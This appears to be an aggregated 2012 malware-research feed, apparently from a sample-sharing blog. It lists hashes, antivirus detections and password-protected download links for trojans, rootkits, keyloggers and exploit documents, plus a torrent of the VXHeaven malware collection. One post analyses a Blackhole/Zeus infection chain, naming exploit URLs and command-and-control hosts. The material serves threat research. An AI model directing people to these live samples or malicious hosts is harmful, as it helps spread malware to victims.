The file is a malware known as "CRDF.Trojan.PWS.Win32.PEx.Delphi.9883274346". Report on this threat: http://threatcenter.crdf.fr/?More&ID=70808 - 70808 -
#malware

011 CVE-2010-0188 PDF - with decided JS (thanks to Villy) - Mar 2012

March 22, 2012, 4:53 am
$
0
0
MD5 B9E21C8ADFB5A3844CC2991ECBE0378C
Virustotal 8 / 41
Decoding help http://www.hashemian.com/tools/html-url-encode-decode.php 
Sample credit: thanks to anonymous donation 

Download (pass infected)



SHA256:     0638324b80aaa7d185f353fd4d5436d70845d648e62791e60cdc1626359c05cc
SHA1:     6bf714ac9dd12d0bfd06ac6377a0658d7c54e046
MD5:     b9e21c8adfb5a3844cc2991ecbe0378c
File size:     16.6 KB ( 17029 bytes )
File name:     1214934.pdf
File type:     PDF
Detection ratio:     8 / 41
Analysis date:     2012-03-22 11:47:54 UTC ( 1 minute ago )
Avast     PDF:ContEx [Heur]     20120320
AVG     Script/PDF.Exploit     20120322
Kaspersky     Exploit.JS.Pdfka.fpt     20120322
Microsoft     Exploit:Win32/Pdfjsc.AAX     20120322
NOD32     JS/Exploit.Pdfka.PJC.Gen     20120322
Sophos     Troj/PDFJs-WR     20120322

012 - Crime - ZeroAccess.D -rootkit - Web - Feb-Mar 2012

April 4, 2012, 7:05 pm
$
0
0

MD5 07665069649a5b4df0316c29ec2b0cdc

Download (pass infected) 





SHA256:9ed60d93d43fc9a8a670e4eab9c0ddda65b59567bad2ffe17f4518d1ad368415
SHA1:1cc11aa2d3936188b47658b73c6044aca84543f5
MD5:07665069649a5b4df0316c29ec2b0cdc
File size:56.1 KB ( 57472 bytes )
File name:07665069649a5b4df0316c29ec2b0cdc
File type:Win32 DLL
Detection ratio:36 / 41
Analysis date:2012-04-02 04:42:34 UTC ( 2 days, 21 hours ago )
0
0
AntivirusResultUpdate
AhnLab-V3Trojan/Win32.ZAccess20120401
AntiVirTR/Rootkit.Gen20120401
Antiy-AVL-20120401
AvastWin32:Rootkit-gen [Rtk]20120401
AVGBackDoor.Generic13.BKJK20120402
BitDefenderGen:Variant.Sirefef.120120402
ByteHero-20120328
CAT-QuickHealRootKit.ZAccess.A20120401
ClamAVTrojan.Rootkit-302620120402
CommtouchW32/Rootkit.M.gen!Eldorado20120401
ComodoTrojWare.Win32.Rootkit.ZAccess.A20120401
DrWebBackDoor.Maxplus.1320120402
EmsisoftTrojan-Dropper.Win32.Sirefef!IK20120402
eTrust-VetWin32/Sirefef.C!generic20120331
F-ProtW32/Rootkit.M.gen!Eldorado20120401
F-SecureGen:Variant.Sirefef.120120402
FortinetW32/Dropper.36D7!tr.rkit20120401
GDataGen:Variant.Sirefef.120120402
IkarusTrojan-Dropper.Win32.Sirefef20120402
JiangminRootkit.ZAccess.y20120331
K7AntiVirusTrojan20120331
KasperskyVirus.Win32.ZAccess.c20120402
McAfeeGeneric Rootkit.ev20120402
McAfee-GW-EditionGeneric Rootkit.ev20120401
MicrosoftTrojanDropper:Win32/Sirefef.B20120401
NOD32Win32/Rootkit.Agent.NUT20120402
NormanW32/ZAccess.R20120401
nProtect-20120401
PandaGeneric Malware20120401
PCToolsTrojan.Zeroaccess20120326
RisingRootKit.Win32.Sirefef.a20120401
SophosTroj/ZAccess-D20120402
SUPERAntiSpyware-20120329
SymantecTrojan.Zeroaccess!inf20120401
TheHackerTrojan/ZAccess.c20120401
TrendMicroTROJ_DRPR.SMUS20120401
TrendMicro-HouseCallTROJ_DRPR.SMUS20120402
VBA32Rootkit.ZAccess.c20120330
VIPRETrojan.Win32.Sirefef.cr (v)20120402
ViRobot-20120402
VirusBusterRootkit.ZAccess!+gmGVd9rpBM20120401
 

013 - Crime -Kelihos.B -trojan- - Web - Feb 2012

April 4, 2012, 7:27 pm
$
0
0
MD5 eca54de6268f57ed1a9a2b9f0f877cb4
 spam trojan

Download (pass infected)

 


SHA256:78ccee8e07ebbc84d9ba4f5d4952ccc6bf516213559b3317a915fd2566c22fe1
SHA1:77a4bc93f54cdeb30804773a8ef7459352fb92be
MD5:eca54de6268f57ed1a9a2b9f0f877cb4
File size:636.0 KB ( 651264 bytes )
File name:eca54de6268f57ed1a9a2b9f0f877cb4.exe
File type:Win32 EXE
Detection ratio:33 / 40
Analysis date:2012-04-05 01:02:12 UTC ( 1 hour, 24 minutes ago )
0
0
AntivirusResultUpdate
AhnLab-V3Trojan/Win32.FakeAV20120404
AntiVirTR/Crypt.XPACK.Gen220120404
Antiy-AVLBackdoor/Win32.Bredolab.gen20120403
AvastWin32:MalOb-GZ [Cryp]20120404
AVGWin32/Cryptor20120404
BitDefenderGen:Variant.Kazy.2110120120405
ByteHero-20120404
CAT-QuickHealFraudTool.Security20120404
ClamAV-20120404
CommtouchW32/SuspPack.DA.gen!Eldorado20120404
ComodoTrojWare.Win32.Kryptik.MZR20120405
DrWebTrojan.Packed.2155220120405
EmsisoftBackdoor.Win32.Kelihos!IK20120405
eSafe-20120404
eTrust-VetWin32/FakeAV.AK!generic20120405
F-ProtW32/SuspPack.DA.gen!Eldorado20120404
F-SecureGen:Variant.Kazy.2110120120404
FortinetW32/PKeliAV.fam@mm20120404
GDataGen:Variant.Kazy.2110120120405
IkarusBackdoor.Win32.Kelihos20120405
JiangminBackdoor/Bredolab.hqp20120331
K7AntiVirusRiskware20120404
KasperskyBackdoor.Win32.Bredolab.mog20120404
McAfeeGeneric FakeAlert.ama20120405
McAfee-GW-EditionGeneric FakeAlert.ama20120404
MicrosoftBackdoor:Win32/Kelihos.B20120404
NOD32a variant of Win32/Kryptik.MZR20120405
NormanW32/FakeAV.ADPU20120404
nProtectBackdoor/W32.Bredolab.651264.CD20120404
PCToolsHeurEngine.MaliciousPacker20120405
Rising-20120401
SUPERAntiSpywareTrojan.Agent/Gen-Multicon20120402
SymantecPacked.Generic.32220120405
TheHacker-20120404
TrendMicroTROJ_FAKEAV.SMIE20120404
TrendMicro-HouseCallTROJ_FAKEAV.SMIE20120405
VBA32-20120404
VIPREFraudTool.Win32.MSRemovalTool.ek!b (v)20120404
ViRobot-20120404
VirusBusterTrojan.Kelihos.Gen!Pac20120404

014 - Crime - Sinowal Mebroot Torpig -rootkit-trojan - Web - Feb-Mar 2012

April 4, 2012, 7:37 pm
$
0
0
MD5:  13CE4CD747E450A129D900E842315328
MD5:  C2BB7A8316EF7A106E6A3B3BB8D5532A
MD5:  CBE853D5D7EC089EF0302789284D6C44
MD5:  E16261185C13FB16213288A3860C1B8D


Download (pass infected)



SHA256:     0dcb7a582a0e72dcccf4fd855a159a4206b67b85fdcd0f58b71d85ba28e40440
SHA1:     69dd85ab1cd7098e1510aec2afa6b3e2a6814999
MD5:     13ce4cd747e450a129d900e842315328
File size:     816.0 KB ( 835584 bytes )
File name:     13ce4cd747e450a129d900e842315328
File type:     Win32 DLL
Detection ratio:     26 / 42
Analysis date:     2012-04-02 04:30:30 UTC ( 2 days, 22 hours ago )

Antivirus     Result     Update
AhnLab-V3     Backdoor/Win32.Sinowal     20120401
AntiVir     TR/Kazy.3545812     20120401
Antiy-AVL     -     20120401
Avast     Win32:Sinowal-JA [Trj]     20120401
AVG     PSW.Agent.7.AZ     20120402
BitDefender     Trojan.PWS.Sinowal.NCX     20120402
ByteHero     -     20120328
CAT-QuickHeal     -     20120401
ClamAV     -     20120402
Commtouch     W32/Sinowal.AA.gen!Eldorado     20120401
Comodo     UnclassifiedMalware     20120401
DrWeb     BackDoor.MaosBoot.377     20120402
Emsisoft     Trojan-Dropper.Agent!IK     20120402
eSafe     -     20120328
eTrust-Vet     Win32/Sinowal.F!generic     20120331
F-Prot     W32/Sinowal.AA.gen!Eldorado     20120401
F-Secure     Trojan.PWS.Sinowal.NCX     20120402
Fortinet     W32/Sinowal.NYN!tr     20120401
GData     Trojan.PWS.Sinowal.NCX     20120402
Ikarus     Trojan-Dropper.Agent     20120402
Jiangmin     -     20120331
K7AntiVirus     Backdoor     20120331
Kaspersky     Backdoor.Win32.Sinowal.odq     20120402
McAfee     -     20120402
McAfee-GW-Edition     -     20120401
Microsoft     PWS:Win32/Sinowal.gen!Y     20120401
NOD32     a variant of Win32/Kryptik.SJI     20120402
Norman     W32/Crypt.AWKB     20120401
nProtect     Trojan.PWS.Sinowal.NCX     20120401
Panda     Suspicious file     20120401
PCTools     -     20120326
Rising     -     20120401
Sophos     Mal/Sinowal-N     20120402
SUPERAntiSpyware     -     20120329
Symantec     -     20120401
TheHacker     -     20120401
TrendMicro     -     20120401
TrendMicro-HouseCall     -     20120402
VBA32     BScope.Trojan.MTA.01512     20120330
VIPRE     Trojan-Dropper.Win32.Sinowal.y (v)     20120402
ViRobot     -     20120402
VirusBuster     Trojan.DR.Sinowal.Gen.20     20120401

015 Crime Koutodoor.F trojan web Feb-Mar 2012

April 4, 2012, 7:41 pm
$
0
0
MD5 ecd4aa51e755f174a39434df02775cc1

Download (pass infected)







SHA256:1765ac579aa3307bd087b7da6018141a4fa7529dfbd0c5a14aa7816b15745ac8
SHA1:be83ea65e884f8156e2242da2f65cde08db53d5f
MD5:ecd4aa51e755f174a39434df02775cc1
File size:39.8 KB ( 40768 bytes )
File name:ecd4aa51e755f174a39434df02775cc1
File type:Win32 EXE
Detection ratio:31 / 42
Analysis date: 2012-03-31 20:37:14 UTC ( 4 days, 6 hours ago )
0
0
AntivirusResultUpdate
AhnLab-V3Win-Trojan/Koutodoor8.Gen20120331
AntiVirTR/Rootkit.Gen20120330
Antiy-AVL-20120331
AvastWin32:Caxnet [Trj]20120331
AVGHider.DXA20120331
BitDefenderGen:Variant.Koutodoor.420120331
ByteHero-20120328
CAT-QuickHealTrojan.Koutodoor.E20120331
ClamAV-20120331
CommtouchW32/Koutodoor.O.gen!Eldorado20120331
ComodoTrojWare.Win32.Zybr.A20120331
DrWebTrojan.PWS.UClub.58020120331
EmsisoftTrojan.WinNT.Koutodoor!IK20120331
eSafe-20120328
eTrust-VetWin32/Koutodoor.G!generic20120331
F-ProtW32/Koutodoor.O.gen!Eldorado20120331
F-SecureGen:Variant.Koutodoor.420120331
FortinetW32/Koutodoor.A!tr.rkit20120331
GDataGen:Variant.Koutodoor.420120331
IkarusTrojan.WinNT.Koutodoor20120331
JiangminTrojan/Generic.bkiv20120331
K7AntiVirusRiskware20120331
KasperskyHEUR:Trojan.Win32.Generic20120331
McAfeeKoutodoor.gen.l20120331
McAfee-GW-EditionKoutodoor.gen.l20120331
MicrosoftTrojan:Win32/Koutodoor.F20120331
NOD32a variant of Win32/Koutodoor.HE20120331
NormanW32/Koutodoor.CUS20120331
nProtect-20120331
Panda-20120331
PCTools-20120326
RisingRootKit.Win32.Obfuscator.g20120331
Sophos-20120331
SUPERAntiSpywareTrojan.Agent/Gen-Koocha20120329
Symantec-20120331
TheHacker-20120331
TrendMicroRTKT_KTDOOR.SMIB20120331
TrendMicro-HouseCallRTKT_KTDOOR.SMIB20120331
VBA32Malware-Cryptor.Inject.gen.220120330
VIPRETrojan.Win32.Koutodoor.e.dll (v)20120331
ViRobot-20120331
VirusBusterRootkit.Koutodoor.Gen.720120331
Search

016 Crime SCKeyLog.O trojan keyloger web Feb-Mar 2012

April 4, 2012, 7:46 pm
$
0
0
MD5 bf53d17ace809cb3015eaed88a46d8aa

Download (pass infected)


 

SHA256:553bdd506f30c0786fd9d02551388bfb3c4e6cc819343e360faa46cc1003b7c7
SHA1:ed29cda3a284acf9eb258dccd9ea476de7a907e2
MD5:bf53d17ace809cb3015eaed88a46d8aa
File size:28.8 KB ( 29460 bytes )
File name:bf53d17ace809cb3015eaed88a46d8aa
File type:Win32 EXE
Tags:armadillo
Detection ratio:39 / 42
Analysis date: 2012-03-31 20:49:32 UTC ( 4 days, 5 hours ago )
0
0
AntivirusResultUpdate
AhnLab-V3Unwanted/Win32.Keylogger20120331
AntiVirTR/Spy.SCKeyLo.o.1720120330
Antiy-AVLTrojan/Win32.SCKeyLog.gen20120331
AvastWin32:SCKeylog-B [Trj]20120331
AVGPSW.Generic8.MUF20120331
BitDefenderTrojan.Generic.409779520120331
ByteHero-20120328
CAT-QuickHealWin32.Trojan-Spy.SCKeyLog.au.420120331
ClamAVTrojan.Spy-20220120331
CommtouchW32/SCkeylogger.D20120331
ComodoTrojWare.Win32.Spy.SCKeyLog.O20120331
DrWebTrojan.SCKeyLog.2020120331
EmsisoftVirus.Win32.SCkeylog!IK20120331
eSafeWin32.Trojan20120328
eTrust-VetWin32/SCKeylog.M20120331
F-ProtW32/SCkeylogger.D20120331
F-SecureTrojan.Generic.409779520120331
FortinetW32/Sckeylog.O!tr20120331
GDataTrojan.Generic.409779520120331
IkarusVirus.Win32.SCkeylog20120331
JiangminTrojanSpy.SCKeyLog.ey20120331
K7AntiVirusSpyware20120331
KasperskyTrojan-Spy.Win32.SCKeyLog.au20120331
McAfeeKeylog-SClog20120331
McAfee-GW-EditionKeylog-SClog20120331
MicrosoftTrojanSpy:Win32/SCKeyLog.O20120331
NOD32Win32/Spy.SCKeyLog.O20120331
NormanSCKeylog.ANMB20120331
nProtect-20120331
PandaTrj/Rovaf.A20120331
PCToolsSpyware.SCKeyLogger!rem20120326
RisingTrojan.Spy.ScrSaver.a20120331
SophosTroj/SCKeyLog-O20120331
SUPERAntiSpyware-20120329
SymantecSpyware.SCKeyLogger20120331
TheHackerTrojan/Spy.SCKeyLog.au20120331
TrendMicroTROJ_FAM_000000700.TOMA20120331
TrendMicro-HouseCallTROJ_FAM_000000700.TOMA20120331
VBA32TrojanSpy.SCKeyLog.au20120330
VIPRETrojan.Win32.Generic!BT20120331
ViRobotTrojan.Win32.SCKeyLog.2948820120331
VirusBusterTrojanSpy.SCKeyLog!MYQVzWmqzaA20120331

017 Crime Dozmot.D trojan web Feb-Mar 2012

April 4, 2012, 7:49 pm
$
0
0
MD5 2190db2c50c6cebffdb13ddeeec23186

 Download (pass infected)




SHA256:     bf97be25c653d648dd27ef76b9fc4b82484940e257c7eaf94f76bfe7561fe137
SHA1:     cc9466b57bc1992bc1ed31eb963df3662e287886
MD5:     2190db2c50c6cebffdb13ddeeec23186
File size:     29.5 KB ( 30208 bytes )
File name:     2190db2c50c6cebffdb13ddeeec23186
File type:     Win32 DLL
Detection ratio:     36 / 42
Analysis date:     2012-03-31 20:52:08 UTC ( 4 days, 5 hours ago )
0
0
Antivirus     Result     Update
AhnLab-V3     Win-Trojan/Onlinegamehack15.Gen     20120331
AntiVir     TR/PSW.OnlineGames.wsrk     20120330
Antiy-AVL     -     20120331
Avast     Win32:Lolyda-B [Trj]     20120331
AVG     PSW.OnlineGames3.BIQR     20120331
BitDefender     Gen:Variant.Graftor.197     20120331
ByteHero     -     20120328
CAT-QuickHeal     TrojanPWS.Dozmot.D4     20120331
ClamAV     Trojan.Spy-73885     20120331
Commtouch     W32/MalwareF.NAFO     20120331
Comodo     TrojWare.Win32.GameThief.Wow.A     20120331
DrWeb     Trojan.PWS.Gamania.origin     20120331
Emsisoft     Trojan-GameThief.Win32.OnLineGames!IK     20120331
eSafe     -     20120328
eTrust-Vet     Win32/Gamepass.PNO     20120331
F-Prot     W32/MalwareF.NAFO     20120331
F-Secure     Gen:Variant.Graftor.197     20120331
Fortinet     W32/Onlinegames.OST!tr.pws     20120331
GData     Gen:Variant.Graftor.197     20120331
Ikarus     Trojan-GameThief.Win32.OnLineGames     20120331
Jiangmin     Trojan/PSW.Magania.axdu     20120331
K7AntiVirus     Riskware     20120331
Kaspersky     Trojan-GameThief.Win32.Magania.eqve     20120331
McAfee     Generic PWS.ff     20120331
McAfee-GW-Edition     Generic PWS.ff     20120331
Microsoft     PWS:Win32/Dozmot.D     20120331
NOD32     a variant of Win32/PSW.WOW.NSF     20120331
Norman     W32/Magania.GZ     20120331
nProtect     -     20120331
Panda     Suspicious file     20120331
PCTools     Trojan-PSW.Generic     20120326
Rising     Trojan.PSW.Win32.GameOL.tje     20120331
Sophos     Troj/PWS-BLS     20120331
SUPERAntiSpyware     -     20120329
Symantec     Infostealer     20120331
TheHacker     Trojan/Magania.eqvb     20120331
TrendMicro     TSPY_GAMETHI.SML     20120331
TrendMicro-HouseCall     TSPY_GAMETHI.SML     20120331
VBA32     BScope.Trojan.OnlineGames.0825     20120330
VIPRE     Trojan.Win32.Generic!BT     20120331
ViRobot     -     20120331
VirusBuster     Trojan.PWS.Magania!3ZNm0Z/N/Rs     20120331

Old (circa 2009-2010) vxhaven's binary collection - 270,000+ files - via torrent

April 8, 2012, 11:14 am
$
0
0
Vxhaven old malware collection.

Vxhavens forum that served malware research community for many years went dark on March 23, 2012. You can read about it (and support if you don't agree with the takedown) here: http://vx.netlux.org/index.html


Regarding the collection:

This collection is not result of the takedown. It has been released as a torrent earlier this year, and but since it is out there in public and already seeded by many and posted in many places, I am posting the torrent link there now as well because it is useful for research and the primary source is not available.  I understand that was not released by owners but I still want to thank Vxhavens members who collected all these samples.

For your convenience, I added a list of binaries in the text file and scroll boxes below.
All binaries in the torrent are older than 2010 (over 270K files, many variants of the same malware), but if you need for some mega testing of your sandbox or need to pick a few special files for some research and comparison, might be useful.

If you need only one or few and desperate/cannot download all on your own, you can ping me, I can send send those few.

Torrent (47GB compressed) - http://thepiratebay.se/torrent/7066921/Vx_heavens_collection%28all%29

Download the text log of all files - no password on the log 

or categorized log is here (save as HTML)



Categories


  1. Backdoors ASP, IRC, BOOT, DOS, Java   BackdoorASPAce
  2. Backdoors - FreeBSD, Linux, Unix, OS2, SunOS, Mac
  3. Backdoors Win16, Win32, Win64
  4. Constructors BAT, DOS, HTML, MSIL, MSWORD, Perl , Ruby, VBS
  5. Constructors Win16, Win32
  6. DoS Linux, Perl, SAP
  7. DoS Win16, Win32, EICAR-Test-File
  8. Email Flooders
  9. Email Win16, Win32
  10. Email Worm BAT, JS, Word, VBS
  11. Exploits Flash/SWF, MSOffice, Perl, MySQL, PHP, Python
  12. Exploits HTML, DOS, IIS, IRC, JAVA/JS
  13. Exploits Linux, Mac OS, Unix, MySQL
  14. Exploits VBS, Win32
  15. Flooder IRC, DOS, Linux, Unix, PHP, Java
  16. Flooder Win32
  17. Hacktools DOS, FreeBSD, Linux, MSIL, Perl, PHP, Shell, SunOS, Unix, Win32,
  18. Hoaxes and Bad Jokes
  19. IM flooders and worms
  20. IRC WormsP2P worms
  21. RATs
  22. SMS Flooders
  23. Sniffers, Spoofers, and Spam tools
  24. some packed samples, Rootkits
  25. Trojans Acad, ANSI, BAT, Boot, DOS
  26. Trojans Bankers
  27. Trojans Clickers
  28. Trojans DDoS
  29. Trojans DOS, Spy
  30. Trojans Downloaders
  31. Trojans Droppers
  32. Trojans EPOC, HTA, HTML, IRC, Java/JS
  33. Trojans Gamethief, IM, Mailfinder, Notifier, Proxy, Password stealers,
  34. Trojans Linux, Unix and Mac
  35. Trojans Lotus, Excel, MSWord, MSIL, Novell, NSIS, OLE2, RAR, Perl, PHP
  36. Trojans Palm, SymbOS
  37. Trojans SMS, SymbOS
  38. Trojans VBS
  39. Trojans Win16, Win32
  40. Virtools
  41. Viruses Acad, 1C, ALS, ABAP, BAT, DOS
  42. Viruses HTML, JS, Java, KIX
  43. Viruses Linux, FreeBSD, Mac,
  44. Viruses Makefile, Matlab, MFL, Menuel, MSAccess, MSExcel, MSWord, MSOffice,
  45. Viruses Multi, PHP, Perl, OS2, Ruby,
  46. Viruses Python, Script, VBS
  47. Viruses Win16, Win32
  48. VWorms BAT, DOS, JS, MSIL, Symbos, VBS, WIn32
  49. Worms Java/JS, PHP, Win32
  50. Worms Linux


Backdoors ASP, IRC, BOOT, DOS, Java

Backdoors - FreeBSD, Linux, Unix, OS2, SunOS, Mac


Backdoors MSIL, MSSQL, Perl, PHP, VBS, Python

Backdoors Win16, Win32, Win64


Constructors BAT, DOS, HTML, MSIL, MSWORD, Perl , Ruby, VBS

Constructors Win16, Win32

DoS Linux, Perl, SAP

DoS Win16, Win32, EICAR-Test-File

Email Flooders

Email Worm BAT, JS, Word, VBS

Email Win16, Win32

Exploits HTML, DOS, IIS, IRC, JAVA/JS

Exploits Linux, Mac OS, Unix, MySQL,

Exploits Flash/SWF, MSOffice, Perl, MySQL, PHP, Python

Exploits VBS, Win32

Flooder IRC, DOS, Linux, Unix, PHP, Java

Flooder Win32

Hacktools DOS, FreeBSD, Linux, MSIL, Perl, PHP, Shell, SunOS, Unix, Win32,

Hoaxes and Bad Jokes

IM flooders and worms

IRC Worms

Worms Linux

Worms Java/JS, PHP, Win32

RATs

P2P worms

some packed samples, Rootkits

SMS Flooders

Sniffers, Spoofers, and Spam tools

Trojans Bankers

Trojans Clickers

Trojans DDoS

Trojans Downloaders

Trojans Droppers

Trojans Gamethief, IM, Mailfinder, Notifier, Proxy, Password stealers,

Trojans SMS, SymbOS

Trojans DOS, Spy

Trojans Acad, ANSI, BAT, Boot, DOS

Trojans EPOC, HTA, HTML, IRC, Java/JS

Trojans Linux, Unix and Mac

Trojans Lotus, Excel, MSWord, MSIL, Novell, NSIS, OLE2, RAR, Perl, PHP

Trojans Palm, SymbOS

Trojans VBS

Trojans Win16, Win32

Virtools

Viruses Acad, 1C, ALS, ABAP, BAT, DOS

Viruses HTML, JS, Java, KIX

Viruses Linux, FreeBSD, Mac,

Viruses Makefile, Matlab, MFL, Menuel, MSAccess, MSExcel, MSWord, MSOffice,

Viruses Multi, PHP, Perl, OS2, Ruby,

Viruses Python, Script, VBS

Viruses Win16, Win32

VWorms BAT, DOS, JS, MSIL, Symbos, VBS, WIn32

018 Crime "Microsoft Update" phish -> Blackhole exploit kit with Zeus payload - web - April 2012

April 29, 2012, 8:21 pm
$
0
0
File: KB971033.exe
Size: 201216
MD5:  EC750B75E83749C715D7834E130FCE8E

File: hnszs0.exe
Size: 184832
MD5:  9DB4174373601F74FCE0ECBC77A9577D

Sample credit Bryan Nolen

Download (pass infected)


LIST OF FILES INCLUDED
│   investigation_notes.txt

├───dropped_files
│   ├───exe
│   │       hnszs0.exe
│   │       KB971033.exe
│   │
│   ├───java
│   │       jar_cache.zip
│   │
│   ├───pdf
│   │       ap1.pdf
│   │       ap2.pdf
│   │
│   └───swf
│           score.swf

├───email
│       MSUPDATE.eml

├───extracted_files
│       pid_1412_Explorer_Dumped.EXE

├───html
│       exploit.html
│       landing.html

└───pcap
        dump.pcap



Quick analysis made by Bryan Nolen

Landing page (hxxp://volozhin.gov.by/pub/KB971033/?clien-e=3D1093821896211 and saved as html/landing.html) contains a hidden IFRAME that leads to the exploit page. This landing page also contains a META REFRESH that leads to another suspect binary (hxxp://volozhin.gov.by/pub/KB971033/KB971033.exe saved as dropped_files/exe/KB971033.exe) - detection on this second binary is low ( https://www.virustotal.com/file/0e14f5e6cdab9218135d3a7eed11f0457c9934210859f6075d63bc609469d43b/analysis/1335596875/ )

Exploit page (hxxp://fewfewfewfew.ibiz.cc/main.php?page=95fc4549d83b0486 and saved as html/exploit.html) utilises a trio of exploits designed to attack java, adobe acrobat, or flash.

Analysis of the javascript was perfomed with the assistance of URLQUERY report link (http://urlquery.net/report.php?id=47909).

The attack payloads are saved as
  • dropped_files/pdf/ap1.pdf 
  • dropped_files/pdf/ap2.pdf 
  • dropped_files/swf/score.swf 
  • dropped_files/java/jar_cache.zip

The "final" malicious payload is saved as (dropped_files/exe/hnszs0.exe) and its detection is VERY poor ( https://www.virustotal.com/file/c48df0394939fccb9a3ac0853d0ae696d04e7c5230d3a6468ebce257a0be4ccc/analysis/1335598639/ )

A copy of explorer.exe extracted from the memory image after infection is included, based on observations this is the process it migrated into after infection. It is saved in (extracted_files/pid_1412_Explorer_Dumped.EXE)

PCAP is supplied in the pcap folder. The hosts identified in this malware are:

Landing Page:    volozhin.gov.by         212.98.162.62
Exploit Page:    fewfewfewfew.ibiz.cc         83.69.233.156
C2:        google-analytics-sv1.com     91.230.147.222
(alt C2):    localdomain01.com         91.230.147.145

Note: the Alternate C2 was seen in earlier investigations of this malware and changed to the C2 address above when this round of investigation was performed.

Full memory dumps from my sandbox VM avaliable on request.

I have a strong suspicion this is a Zeus varient.


-Bryan Nolen <bryan _at_ arc .dot. net .dot. au>
@bryannolen

SITE TYPE
LEGITIMATE, COMPROMISED   
212.98.162.62
volozhin.gov.by    Belarus    AS12406 Business network j.v.    Business Network JV
                       
BLACKHOLE    
83.69.233.156
fewfewfewfew.ibiz.cc    Russian Federation    AS28762 AWAX Telecom Ltd    AWAX Telecom Ltd.

PAYLOAD - ZEUS   
C2
91.230.147.222
google-analytics-sv1.com Russian Federation    AS57189 PE Spiridonova Vera Ana    OOO Aldevir Invest
 
C2
91.230.147.145
localdomain01.comRussian Federation    AS57189 PE Spiridonova Vera Ana    OOO Aldevir Invest





019 APT Speech.doc MacOS_X/MS09-027.A Word exploit for MS Word

May 3, 2012, 8:07 pm
$
0
0
Someone uploaded. Thank you for sharing.
Document language code is Arabic, which is kind of interesting.

Research: Microsoft An interesting case of Mac OSX malware


 Download (pass infected)

File: speech.doc
Size: 158854
MD5:  F4CBFE4F2DDF3F599984CF6D01C1B781


The text of the decoy (clean doc) message
Your  Excellency
The United Nations Commission for Human Rights
The United Nations Commission for Human Rights Office
Geneva, Switzerland.
Dated: 9th March 2012.
Your Excellency,
The Tibetans throughout the Globe will co-mmemorate the 53rd Anniversary of the Tibetan National Uprising Day in Lhasa, Tibet in 1959, against the Peoples Republic of China.  During these 53 long years of struggle, thousands of innocent Tibetans were tortured, imprisoned  and killed by the Chinese government,without a fair trial.  Tibet
s rich resources are plundered and the environment destroyed with deforestation, elimination of its rare species of wildife and diverting and damming of Tibet
s holy rivers which are source of lifeline for many Asian countries.
Since 2008, massive crackdowns and indoctrination of Tibetan monks and nuns were imposed by the Chinese Government.  Due to heavy handedness of the Chinese authorities, and the unbearable condition of the Tibetans under their most repressive rule, the Tibetans from all parts of Tibet, especiall y Ngaba and Karzi regions unitedly protested, demanding  the return of Tibet
s spiritual leader H.Holiness the Dalai Lama and freedom for Tibet.   Instead of addressing the problems being faced by the Tibetans under the Chinese repressive rule in Tibet, the Chinese authorities sought to use  forceful methods by firing on unarmed Tibetan protestors, beating and injuring them.  Since 16th March 2011, over 24 Tibetan
s have self-immolated, calling for return of Tibet
s spiritual leader H.Holiness the Dalai Lama and freedom for Tibet.  In short, Tibet is cut off from outside world, with ban on the entry of foreign media personnel and tourists.
We therefore, appeal to your Excellency and the representatives of the United Nations member countries to take immediate action on the following demands:-
 1)   Insist the Peoples Republic of China to immediately call back all Chinese Security personnel  from Ngaba and Karzi regions of Tibet.
           
2)  All the monks and nuns must be allowed to return unconditionally to their respective    monasteries
3)    Insist the Chinese authorities to release all the political prisoners,  especially  the young Panchen Lama, Gedun  Choekyi  Nyima and Tulku Tenzin Delek 
 4) Allow foreign diplomats and independent media unfettered access to all the Tibetan areas for observation
Stop all forms of percecution in Tibet and adhere to Global Human Rights norms.
Your Excellency, we Tibetans inside Tibet and in other parts of the world, appeal and look forward eagerly to genuine political support from the United Nations like any other weaker nations who are facing  tremendous aggression from more powerful nations in the world.
As you are aware, we Tibetans, under the leadership of His Holiness the Dalai Lama, the non-violent and compassionate leader who follows non-violent even to last resort, continue to follow His steps to gain Freedom for the Tibetans.
Thanking you,
With due respect and hope,
TENZIN WANGMO                                                            PHURBU LHAMO
      President                                                                            President
RTWA   Bylakuppe, Karnataka State                             RTWA Kollegal, Karnataka State      
xicp.net

Shanghai Best Oray Information S&T Co., Ltd.
Shanghai Best Oray Information S&T Co., Ltd. (yezi@oray.com )
1st Floor of No. 15 Jian Gong Road Tianhe District
guangzhou
,510665
China
Tel. +86.2061073384
Fax. +86.20


Virustotal
SHA256:     6a70e797617bb8958bfbe94a42374447e3859c6b4ef1e108d43a30b5db74480b
SHA1:     445959611bc2480357057664bb597c803a349386
MD5:     f4cbfe4f2ddf3f599984cf6d01c1b781
File size:     155.1 KB ( 158854 bytes )
File name:     speech.doc
File type:     MS Word Document
Detection ratio:     27 / 42
Analysis date:     2012-05-04 02:00:26 UTC ( 48 minutes ago )
AhnLab-V3     Dropper/Ms09-027     20120503
AntiVir     EXP/CVE-2009-0563.A     20120504
Antiy-AVL     Exploit/MSWord.CVE-2009-0563     20120504
Avast     MacOS:DocDrop-A [Expl]     20120504
BitDefender     Exploit.CVE-2009-0563.Gen     20120504
ClamAV     OSX.Word.Malware     20120504
Comodo     UnclassifiedMalware     20120503
DrWeb     Exploit.MS09-027.1     20120504
Emsisoft     Exploit.MS04.CVE-2004-0210-2009-0563.A!IK     20120504
eTrust-Vet     OSX/MS09-027!exploit     20120503
F-Secure     Exploit:OSX/MS09027.A     20120504
Fortinet     W97M/CVE_2009_0563.A!exploit     20120504
GData     Exploit.CVE-2009-0563.Gen     20120504
Ikarus     Exploit.MS04.CVE-2004-0210-2009-0563.A     20120504
Kaspersky     Exploit.MSWord.CVE-2009-0563.a     20120504
McAfee     Exploit-MSWord.m     20120503
McAfee-GW-Edition     Heuristic.BehavesLike.Exploit.W97.CodeExec.O     20120503
Microsoft     Exploit:MacOS_X/MS09-027.A     20120503
NOD32     OSX/Exploit.MSWord.CVE-2009-0563.A     20120504
nProtect     Exploit.CVE-2009-0563.Gen     20120503
PCTools     Trojan.Mdropper     20120504
Sophos     Troj/DocOSXDr-A     20120504
SUPERAntiSpyware     -     20120411
Symantec     Trojan.Mdropper     20120504
TrendMicro     TROJ_MDROPR.LB     20120503
TrendMicro-HouseCall     -     20120504
VIPRE     Trojan.Msword.Mdropper.a (v)     20120503
VirusBuster     Exploit.CVE-2009-0563.Gen     20120503


You have not signed in. Only registered users can leave comments, sign in and have a voice!
Sign in Join the community
No votes
More votes
An error occurred
ssdeep
1536:KgyNLrsGpdccCBOdK4TaC5V7dMorYjTBGI:ONPsGpe4TaCf7c
TrID
Microsoft Word document (80.0%)
Generic OLE2 / Multistream Compound File (20.0%)
ExifTool

SharedDoc................: No
